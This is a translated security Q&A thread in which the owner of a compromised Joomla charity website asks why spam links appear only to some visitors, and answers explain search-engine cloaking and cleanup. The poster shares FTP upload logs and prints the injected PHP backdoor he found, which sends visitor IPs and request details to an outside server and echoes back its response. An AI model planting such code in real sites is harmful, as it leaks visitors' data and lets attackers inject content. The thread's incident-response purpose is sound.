Código de malware agregado cuando el sitio se ve externamente

8

Por favor, vea segundo seguimiento en la parte inferior. (Ahora con código malicioso real agregado! ... ish)

Solicitado por esta pregunta, yo ' He notado que la organización de caridad estudiantil de mi universidad tiene un problema interesante en su sitio web del que hasta ahora no he podido encontrar la causa. (Pido disculpas si esto sería mejor en ServerFault, pero no parece haber ningún problema con el servidor en sí, ¡es más un problema de malware en algún lugar de la línea!)

Su sitio web, enlace tiene una carga completa de enlaces porno / malware en la parte inferior de la página (parece que esto para mí), pero creo, solo cuando lo ves desde una conexión de banda ancha O2. Si lo ve dentro de la red de la universidad u otro ISP, no aparece nada en la parte inferior y, como era de esperar, dentro de las páginas de administración de CMS, nada aparece como si estuviera en la plantilla o en las páginas.

Estoy 99% seguro de que el servidor no está ubicado dentro de la red de la universidad, mirando su IP (creo que está alojado en 'A Small Orange'). Definitivamente no soy la única persona que ha visto este problema, aunque no estoy seguro de si es específico de un solo ISP del Reino Unido, O2 Broadband (un amigo de otro ISP, TalkTalk ha confirmado que no ve nada). Nunca he visto algo como esto antes, no ha sido un caso simple de piratería del servidor y entrada de código a la página.

Apreciaría cualquier idea en cuanto a las rutas para resolver este problema, cualquier idea sobre qué podría estar causando esto y cualquier otro consejo.

Gracias.

Bien, ahora en seguimiento a la anterior (gracias a todos por su ayuda), ahora he logrado convencer a la empresa de alojamiento web para que me brinde acceso a SSH. Descubrí que el archivo .htaccess se ha modificado, y el archivo .htaccess actual es el siguiente: enlace , que supongo que es al menos parte del problema. Desde el punto de vista de la limpieza (en términos de avanzar / limpiar el sitio nuevamente), sé que debería limpiar todo el servidor y comenzar de nuevo.

Sin embargo , es un servidor de alojamiento compartido, por lo que no puedo borrarlo, ya que no tengo control de todo el servidor. He señalado a los servidores web que ha sido pirateado, y su consejo fue:

  

La cuenta es una cuenta de alojamiento compartido, pero el acceso está limitado solo a la cuenta en sí. No se pueden realizar modificaciones al propio servidor desde un compromiso de nivel de usuario.

     

Como no se ha puesto en peligro nada en el servidor (solo su cuenta), el acceso a jailshell proporcionado será suficiente para que pueda investigar y limpiar esta cuenta.

¿Es esto cierto? ¿Puedo limpiarlo correctamente? Supongo que si utilizaron una vulnerabilidad en el software que se ejecuta en mi sitio (es decir, Joomla), entonces sí, solo será mi parte del servidor la que se ha comprometido. Sin embargo, si el servidor está ejecutando una vulnerabilidad en el sistema operativo, es obvio que todo el lote podría verse comprometido. ¿Hay alguna forma de resolverlo?

En enlaces anteriores: he visto & lea todo esto .

... y ahora tengo los registros que muestran lo que han hecho:

Thu Feb 02 14:35:46 2012 0 213.5.xxx.xxx 45 /home/durhamdu/__check.html a _ i r durhamdu ftp 1 * c
Thu Feb 02 14:35:49 2012 0 213.5.xxx.xxx 45 /home/durhamdu/public_html/__check.html a _ i r durhamdu ftp 1 * c
Thu Feb 02 14:35:53 2012 0 213.5.xxx.xxx 34957 /home/durhamdu/public_html/libraries/joomla/environment/url.php a _ i r durhamdu ftp 1 * c

Mon Apr 09 04:21:53 2012 0 128.127.xxx.xxx 45 /home/durhamdu/__check.html a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:00 2012 0 128.127.xxx.xxx 45 /home/durhamdu/public_html/__check.html a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:06 2012 0 128.127.xxx.xxx 1457 /home/durhamdu/public_html/mooving/check.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:09 2012 0 128.127.xxx.xxx 17986 /home/durhamdu/public_html/mooving/laundro.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:18 2012 0 128.127.xxx.xxx 52457 /home/durhamdu/public_html/.htaccess a _ i r durhamdu ftp

Los archivos a los que se hace referencia ya no están más, pero los enlaces siguen apareciendo, y aunque he cambiado el nombre del archivo sospechoso .htaccess . Hmm ...

Bien, en el segundo seguimiento, ahora he encontrado el código malicioso para su lectura colectiva:

<?php   
// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $sReferer = '';
    if(isset($_SERVER['HTTP_REFERER']) === true)
    {
        $sReferer = strtolower($_SERVER['HTTP_REFERER']);
    }
    $stCurlHandle = NULL;
    if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics         
        $stCurlHandle = curl_init('http://webdefense1.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer)); 
    } else
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics         
        $stCurlHandle = curl_init('http://webdefense1.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer)); 
    }
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = curl_exec($stCurlHandle); 
    curl_close($stCurlHandle); 
    echo $sResult; // Statistic code end
?>

Obviamente, ahora lo he quitado y estoy a punto de parchear la instalación de Joomla. ¡Gracias por su ayuda a todos! :-)

    
pregunta Savara 08.05.2012 - 16:09
fuente

5 respuestas

6

Creo que el servidor se ha modificado para que solo sirva a la página con los enlaces a ciertas personas que acceden a él .

Esto es evidente cuando miras el caché de Google para la página: enlace que muestra los enlaces en su captura de pantalla.

Esta es una táctica común utilizada para que los usuarios del sitio web no aparezcan los enlaces, pero sí para los motores de búsqueda. Esto se hace porque estos enlaces se utilizan en ataques SEO y al autor solo le importa que los motores de búsqueda vean los enlaces.

Parece que cualquier técnica que se esté utilizando equivocadamente identifica a los usuarios de banda ancha de O2 como un motor de búsqueda y, por lo tanto, se muestran los enlaces.

Otra posibilidad es que se hayan eliminado los enlaces a la página, pero O2 y Google están sirviendo una versión en caché de la página con los enlaces aún en .

    
respondido por el Andy Smith 08.05.2012 - 19:37
fuente
2

Parece que el servidor web puede haber sido comprometido.

Los chicos malos han comenzado a ponerse furtivos. En lugar de insertar enlaces en la página de forma ingenua, algunos tipos malos organizarán que solo ciertos usuarios vean la versión modificada de la página web. (Definitivamente he visto que este filtrado se realiza con el encabezado del Referer, pero también he oído que también lo hace la dirección IP).

Si el servidor se ha comprometido, busque en este sitio cómo recuperarse de un hack. Básicamente, usted tendrá que "atacar desde la órbita": borrar, reformatear, reinstalar desde cero, actualizar todo el software, bloquear el servidor, restaurar los datos de una copia de seguridad antigua que se sabe que está bien y solo traerla volver a vivir en la Internet pública.

    
respondido por el D.W. 08.05.2012 - 20:51
fuente
1

Uno de mis clientes tiene el mismo problema en una instalación de Joomla. Lo localicé en los siguientes archivos:

../public_html/libraries/joomla/environment/url.php

y

../public_html/templates/THEME_NAME/index.php

El archivo url.php es un archivo ficticio, así que simplemente elimínelo. El archivo de índice es un poco más desordenado. Lo que hice fue simplemente eliminar el que estaba en la carpeta y luego cargar uno nuevo desde otra instalación del mismo tema. Si lo desea, puede seleccionar línea por línea los hacks, pero si ha usado el tema en otro lugar, simplemente copie la versión correcta en el sitio pirateado.

Esto parece haberse mantenido, por lo que creo que fue el único daño que hizo.

El pirateo parece estar dirigido a enviar direcciones IP y detalles de la computadora a una dirección de correo electrónico, probablemente para que puedan dirigirse efectivamente a tu PC. ¡No envíe el correo electrónico!

    
respondido por el Iain 01.12.2012 - 02:37
fuente
0

quizás su ISP tenga un malware de cambiador de DNS que dirija a los usuarios a otro sitio web similar al servidor web de la Universidad para que navegue por el sitio web con su dirección IP, que es 184.173.73.180 para mí, qué dirección IP obtiene al hacer ping al Servidor web ...?

    
respondido por el P3nT3ster 08.05.2012 - 17:08
fuente
0

He encontrado casi exactamente el mismo problema con el sitio web de mi hija.

Se basa en Joomla. En el PHP para las páginas, he encontrado casi exactamente el mismo código que se muestra en este blog. He eliminado temporalmente este código y ahora los enlaces no aparecen.

El hack salió a la luz cuando un amigo denunció los enlaces maliciosos a mi hija. él estaba usando O2, pero nunca habíamos visto los enlaces, usamos Virgin Media y Sky.

El sitio de Joomla está alojado por Rochen, que "suministra" el Joomla. Por lo tanto, solo tenemos el control de nuestro propio sitio, que fue desarrollado por un consultor que ya no desea mantener el sitio.

Me involucré porque tengo más de 35 años de experiencia en computación, incluido el sitio web, la escritura del generador de programas, la compilación, PHP, etc.

Mi otra hija también está ayudando - Licenciatura en informática de 1ra clase de la Universidad de Leeds.

Aún tenemos que ubicar el código malicioso en el sitio involucrado, cualquier comentario o sugerencia sería bienvenido.

    
respondido por el The Snail 05.01.2013 - 12:49
fuente

Lea otras preguntas en las etiquetas